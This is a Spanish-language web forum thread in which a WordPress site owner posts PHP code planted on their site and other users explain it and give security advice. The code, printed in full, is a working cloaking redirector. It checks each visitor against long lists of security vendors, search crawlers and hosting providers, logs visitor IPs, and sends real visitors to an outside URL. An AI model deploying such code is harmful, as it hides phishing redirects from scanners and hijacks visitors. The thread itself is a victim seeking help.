codigo en mi web

raysn22 · 30 Sep 2020

saludos me inyectaron el siguiente codigo en mi web y me gustaria saber de que trata, por este codigo me pusieron cartel rojo en google, ya que la competencia al parecer no puede ganarle a mi web con SEO tuvieron que ponerme su disparate en la pagina, Espero y al que hizo esto le vaya bien en todos sus proyectos

Insertar CODE, HTML o PHP:

<?php
error_reporting(0);
date_default_timezone_set('Asia/Jakarta');
$user_agent     =   $_SERVER['HTTP_USER_AGENT'];

function rand_string($length){
  $chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
  return substr (str_shuffle ($chars),0,$length);
}

function getOS() {
    global $user_agent;
    $os_platform    =   "Another";
    $os_array       =   array(
                            '/windows nt 6.2/i'     =>  'Windows 8',
                            '/windows nt 6.1/i'     =>  'Windows 7',
                            '/windows nt 6.0/i'     =>  'Windows Vista',
                            '/windows nt 5.2/i'     =>  'Windows Server 2003/XP x64',
                            '/windows nt 5.1/i'     =>  'Windows XP',
                            '/windows xp/i'         =>  'Windows XP',
                            '/windows nt 5.0/i'     =>  'Windows 2000',
                            '/windows me/i'         =>  'Windows ME',
                            '/win98/i'              =>  'Windows 98',
                            '/win95/i'              =>  'Windows 95',
                            '/win16/i'              =>  'Windows 3.11',
                            '/macintosh|mac os x/i' =>  'Mac OS X',
                            '/mac_powerpc/i'        =>  'Mac OS 9',
                            '/linux/i'              =>  'Linux',
                            '/ubuntu/i'             =>  'Ubuntu',
                            '/iphone/i'             =>  'iPhone',
                            '/ipod/i'               =>  'iPod',
                            '/ipad/i'               =>  'iPad',
                            '/android/i'            =>  'Android',
                            '/blackberry/i'         =>  'BlackBerry',
                            '/webos/i'              =>  'Mobile'
                        );
    foreach ($os_array as $regex => $value) {
        if (preg_match($regex, $user_agent)) {
            $os_platform    =   $value;
        }
    }
    return $os_platform;
}

function get_browser_name($user_agent){
    if (strpos($user_agent, 'Opera') || strpos($user_agent, 'OPR/')) return 'Opera';
    elseif (strpos($user_agent, 'Edge')) return 'Edge';
    elseif (strpos($user_agent, 'Chrome')) return 'Chrome';
    elseif (strpos($user_agent, 'Safari')) return 'Safari';
    elseif (strpos($user_agent, 'Firefox')) return 'Firefox';
    elseif (strpos($user_agent, 'MSIE') || strpos($user_agent, 'Trident/7')) return 'Internet Explorer';
    return 'Other';
}
$user_os        =   getOS();
$user_browser   =   get_browser_name($_SERVER['HTTP_USER_AGENT']);
$from           = $_SERVER['HTTP_REFERER'];
$ip             = $_SERVER['REMOTE_ADDR'];
$getip          = 'http://ip-api.com/json/' . $ip;
$content        = file_get_contents($getip);
$details        = json_decode($content);
$negara         = $details->countryCode;
$nama_negara    = $details->country;
$organ            = $details->org;
$kode_negara    = strtolower($negara);
$ip             = $_SERVER['REMOTE_ADDR'];
$dateTime       = date("F j, Y, g:i a");
$blocked_words  = array("ams","DigitalOcean","Apple Inc","drweb","Dr.Web","hostinger","scanurl","above","google","facebook","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
$denny_ips      = array(
"Apple",
"Avenir Telematique S.A.S.",
"Palo Alto Networks",
"Internet Initiative Japan",
"Atlantic.net",
"Choopa, LLC",
"Digital Ocean",
"DigitalOcean",
"Linode",
"Commtouch",
"Faction",
"RamNode LLC",
"Slovak Telecom",
"Cogent Communications",
"Host1Plus",
"Virginia Polytechnic Institute and State Univ.",
"IPVanish",
"Total Server Solutions L.L.C.",
"Providers Internet Exchange",
"Community Network Center",
"Plusnet",
"Community Network Center Incorporated.",
"STNet, Incorporated",
"ARTERIA Networks Corporation",
"VECTANT",
"ManagedWay",
"Paragon Internet Group Limited",
"Research Organization of Information and Systems",
"Kintetsu Cable Network Co.",
"Chubu Telecommunications Company",
"EGIHosting",
"ColoUp",
"Ishikawa Computer Center Co.,LTD",
"Secured Servers LLC",
"Datacamp Limited",
"ServeTheWorld AS",
"Netstack Cloud Services",
"Hurricane Electric",
"LogicWeb Inc",
"Bell Canada",
"Hosting Solution",
"OVH Hosting",
"OVH SAS",
"Yahoo!",
"SoftLayer Technologies",
"Twitter",
"Web Hosted Group Ltd ",
"M247 Ltd Paris ",
"SunGard Availability Services LP",
"Scaleway",
"FireEye",
"Servers.com",
"ServerMania",
"Top Level Hosting SRL",
"Rheinische Friedrich-Wilhelms-Universitaet Bonn",
"Online SAS Nl",
"Trend Micro Incorporated",
"Amazon.com",
"Trustwave Holdings",
"wideopenwest",
"LeaseWeb Netherlands B.V.",
"D-hosting die Rackspace \u0026 Connectivity GmbH",
"Keyweb AG IP Network",
"Wowrack.com",
"Nexril",
"Versaweb, LLC",
"Kath Codex Pvt.",
"its communications",
"Kakao Corp ",
"Bitdefender SRL",
"China Unicom Liaoning",
"ViaWest",
"Panasonic Corporation Corporate Information System",
"Google Cloud",
"Comodo CA Ltd",
"Google Proxy",
"Mediasift Limited",
"UK Dedicated Servers Limited",
"Googlebot",
"Google",
"GZ Systems",
"active-servers.com",
"Lg Dacom Kidc",
"GTT Communications Inc.",
"Codero",
"Dediserve Ltd",
"Host Sailor Ltd.",
"Yahoo Inc, Internet Content Provider",
"Yahoo Japan",
"Amazon",
"Barracuda Networks",
"Sentris Network LLC",
"internet content provider",
"Yahoo",
"Kaspersky Lab AO",
"Gottfried Wilhelm Leibniz Universitaet Hannover",
"MAXNET",
"Versatel Deutschland",
"O2 Deutschland",
"Versatel Deutschland",
"HEG US",
"PacketExchange",
"TierPoint, LLC",
"Tiggee LLC",
"Symantec Corporation",
"Shanghai Blue Cloud Technology Co.,Ltd",
"Hetzner Online GmbH",
"PayPal",
"PT Telkom Indonesia",
"Cloudflare",
"Enteracloud Solutions",
"Facebook",
"Onavo Mobile",
"NFOrce Entertainment B.V.",
"District School Board of Pasco County",
"Wireless Data Service Provider Corporation",
"Limestone Networks",
"QUALYS",
"M247 Ltd New Jersey",
"Rackspace Hosting",
"Unified Layer",
"Microsoft Azure",
"Microsoft",
"Microsoft bingbot",
"Vultr Holdings, LLC",
"ip-54-36-149-5.a.ahrefs.com",
"51-159-4-12.rev.poneytelecom.eu",
"104.223.67.187.static.greencloudvps.com",
"216.244.66.203",
"104.128.234.122",
"no.rdns.greencloudvps.com",
"crawl6.bl.semrush.com",
"107.155.118.27",
"ip-54-36-148-223.a.ahrefs.com",
"ip-54-36-148-134.a.ahrefs.com",
"36.26.119.49",
"192.210.223.253",
"ip-54-36-148-125.a.ahrefs.com",
"62.210.80.74",
"124.158.5.38",
"49.88.25.140",
"vmi227873.contaboserver.net",
"crawl11.bl.semrush.com",
"23.83.179.134",
"180.117.36.74",
"45.76.155.166.vultr.com",
"113.121.156.94",
"107.45.43.120.broad.nd.fj.dynamic.163data.com.cn",
"crawl1.bl.semrush.com",
"ip-54-36-148-35.a.ahrefs.com",
"115.230.71.32",
"crawl23.bl.semrush.com",
"crawl24.bl.semrush.com",
"103.88.233.5",
"ip-54-36-148-178.a.ahrefs.com",
"230.45.43.120.broad.nd.fj.dynamic.163data.com.cn",
"ec2-54-226-23-160.compute-1.amazonaws.com",
"222.74.237.246",
"180.109.38.141",
"122.241.65.164",
"121.189.37.14",
"static-68-235-34-36.cust.tzulo.com",
"36.70.252.92",
"ip180.ip-144-217-178.net",
"180.117.100.64",
"113.121.243.229",
"117.90.212.166",
"crawl19.bl.semrush.com",
"mx1.heimdall.net",
"62.210.80.58",
"103.90.229.52",
"ip-54-36-149-79.a.ahrefs.com",
"101.37.89.152",
"121.157.50.242",
"crawl19.bl.semrush.com",
"mx1.heimdall.net",
"Vultr",
"Aruba",
"ArubaCloud",
"z.com",
"Microsoft Corporation",
"Level 3 Communications",
"Powerhouse Management",
"Avenir Telematique S.A.S",
"SurfControl",
"Invitech Megoldasok Zrt.",
"Zscaler",
"Telmex",
"Social Security Administration",
"Spectrum",
"Aruba",
"Tata Communications",
"Zscaler Switzerland GmbH",
"Netmagic Datacenter Mumbai",);

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("Location: https://google.com");
        exit;
    }
}

if (in_array ($organ, $denny_ips)) {
    $fh = fopen('log.txt', 'a+');
    fwrite($fh, 'Blocked by IPs:'." [$user_os - $user_browser - $ip - $organ ] $from\n");
    fclose($fh);
    header("Location: https://google.com");
}
/*
elseif(in_array ($ip, $denyIPs)){
    $crot = fopen('ip.txt, 'a+');
    fwrite ($crot, $ip \n);
    fclose($crot);
    header(Locations; https://google.com");
    }
    */
else{
    $klik = 'total_klik.txt';
    $total = (file_exists($klik)?file_get_contents($klik):0);
    $total = file_put_contents($klik, $total+1);
    $asu = rand_string(20);
    $redirnya = array("https://www.anoptic.com/aws/",);
    $ac = count($redirnya) -1;
    $rd = rand (0,$ac);
    $rda = $redirnya[$rd];
    header("location:".$rda);
    $fh = fopen('log.txt', 'a+');
    fwrite($fh, '[+]DATA MASUK[+]:'."[ $dateTime ] [ $organ ][ $ip ] [ $nama_negara - $user_os - $user_browser  ] $from | $rda\n");
    fclose($fh);
}
exit;
?>

Franyer Rivas · 30 Sep 2020

¿en donde lo inyectaron y como lo detectaste?
estás usando algun theme o plugin nulled ?

raysn22 · 30 Sep 2020

Franyer Rivas dijo:
¿en donde lo inyectaron y como lo detectaste?
estás usando algun theme o plugin nulled ?

utilizo toroplay hace un año, primero me salio el cartel rojo en la pagina principal hice redireccion y ya cuando todas las key estaban poniendose en el top me inyectaron ese codigo y google lo detecto y me señalo la URL, ese codigo estaba en imagenes y ahi no puede haber un codigo php

Franyer Rivas · 30 Sep 2020

raysn22 dijo:
utilizo toroplay hace un año, primero me salio el cartel rojo en la pagina principal hice redireccion y ya cuando todas las key estaban poniendose en el top me inyectaron ese codigo y google lo detecto y me señalo la URL, ese codigo estaba en imagenes y ahi no puede haber un codigo php

vaya, tendras que pedir a un programador que revise si hay vulnerabilidades en el theme o plugins que tienes, ya que si lo hicieron una vez seguramente intenten nuevamente

raysn22 · 30 Sep 2020

Franyer Rivas dijo:
vaya, tendras que pedir a un programador que revise si hay vulnerabilidades en el theme o plugins que tienes, ya que si lo hicieron una vez seguramente intenten nuevamente

lo curioso es que ese codigo no esta en el dominio principal , solo me lo inyectaron en el segundo, ya tengo un programador trabajando en esas vulnerabilidades, la gente no puede ver progresando una web

Franyer Rivas · 30 Sep 2020

raysn22 dijo:
lo curioso es que ese codigo no esta en el dominio principal , solo me lo inyectaron en el segundo, ya tengo un programador trabajando en esas vulnerabilidades, la gente no puede ver progresando una web

seguro es una web warez la tuya, es normal , cuando hay una web en los top, las atacan con DDos e inyecciones SQL y todo lo que se les ocurra.
Así que te recomiendo entrar a diario a tu sitio en modo incógnito y desde el móvil y navegar al menos 30 segundos, para revisar que no haya redirecciones o cosas raras

raysn22 · 30 Sep 2020

Franyer Rivas dijo:
seguro es una web warez la tuya, es normal , cuando hay una web en los top, las atacan con DDos e inyecciones SQL y todo lo que se les ocurra.
Así que te recomiendo entrar a diario a tu sitio en modo incógnito y desde el móvil y navegar al menos 30 segundos, para revisar que no haya redirecciones o cosas raras

Siempre suelo hacer eso, mi web no es tann famosa pero andaba metiéndose por algunas keys, pero el pastel es grande no se porque tanta mala fe en el warez

YeltsinReyes · 30 Sep 2020

Veo muchas redirecciones en ese codigo!

misterlopez · 30 Sep 2020

¿Cuántas visitas diarias tenías en la web?

Ese código, ¿en qué archivo del tema lo tenías?

El tema, ¿ lo compraste al creador o lo encontraste por ahí o comprado a otra persona?

raysn22 · 30 Sep 2020

misterlopez dijo:
¿Cuántas visitas diarias tenías en la web?

Ese código, ¿en qué archivo del tema lo tenías?

El tema, ¿ lo compraste al creador o lo encontraste por ahí o comprado a otra persona?

Tenia 30k diarias, el código estaba en un archivo img que cree para poner banderitas de idiomas, esa carpeta estaba en el wordpress donde esta wp-admin wp-content, y el theme fue puesto gratis por el creador ya la web tiene 1 año y ahora es que me viene a pasar esto

emanuel199811 · 1 Oct 2020

wooow son demasiado buenos los que te hicieron el ataque, lei todo el código se paso por paso que hicieron pero abreviando hicieron estas dos cosas.
1) bloquiaron tu trafico tomando todas las ip que los usuarios entrantes así cayeras en el ranking de google y no permitiendoles mas la entrada redigiendolos, aparte de eso que es obvio, identificaron tu trafico no se con algún tipo de propósito de marketing para ellos o algo maso menos asi.
2) por otra parte trataron de infectar los navegadores de tus usuarios, me imagino que para redirigir el trafico a sus web que es lo mas normal.

raysn22 · 1 Oct 2020

emanuel199811 dijo:
wooow son demasiado buenos los que te hicieron el ataque, lei todo el código se paso por paso que hicieron pero abreviando hicieron estas dos cosas.
1) bloquiaron tu trafico tomando todas las ip que los usuarios entrantes así cayeras en el ranking de google y no permitiendoles mas la entrada redigiendolos, aparte de eso que es obvio, identificaron tu trafico no se con algún tipo de propósito de marketing para ellos o algo maso menos asi.
2) por otra parte trataron de infectar los navegadores de tus usuarios, me imagino que para redirigir el trafico a sus web que es lo mas normal.

Wtf hicieron toda esa vaina, pero por algun lugar entraron quizás el theme o algún plugin incluso ayer me borraron todos los archivos de mi web cuando vieron que yo borraba el archivo infectado que me subieron, cuando empezaron a borrarme los archivos de WordPress vi que me subieron el siguiente archivo hazeen.php entonces ahí accedí a borrar todos los archivos que quedaban

Dieguit0sk8 · 1 Oct 2020

Muy interesante la lista de ISP e ips para detectar crawlers, al detectar todos los bots de busqueda pueden reedireccionar el sitio a cualquier lado para que te caiga el ranking por el piso, a las visitas que no son bots de buscadores las reedirecciona al link infectado para que los visitantes no entren mas a tus sitios y pierdas visitas. Muy mal intencionados realmente, vas a tener que trabajar en la seguridad de todo tu theme y wordpress para que no te injecten mas codigos.

raysn22 · 1 Oct 2020

Dieguit0sk8 dijo:
Muy interesante la lista de ISP e ips para detectar crawlers, al detectar todos los bots de busqueda pueden reedireccionar el sitio a cualquier lado para que te caiga el ranking por el piso, a las visitas que no son bots de buscadores las reedirecciona al link infectado para que los visitantes no entren mas a tus sitios y pierdas visitas. Muy mal intencionados realmente, vas a tener que trabajar en la seguridad de todo tu theme y wordpress para que no te injecten mas codigos.

eso ando buscando alguien que pueda analizar el theme a ver que tal esta la seguridad de el porque supongo que entraron por ahi tuve que hacer una redireccion 301 a un nuevo dominio inmediatamente hice eso empezaron a meterme codigos en ese dominio y no tardo 2 dias para que google me de otro cartel rojo, Que pude quitarlo en seguida eliminando el codigo, pero quiero ponerle seguridad al theme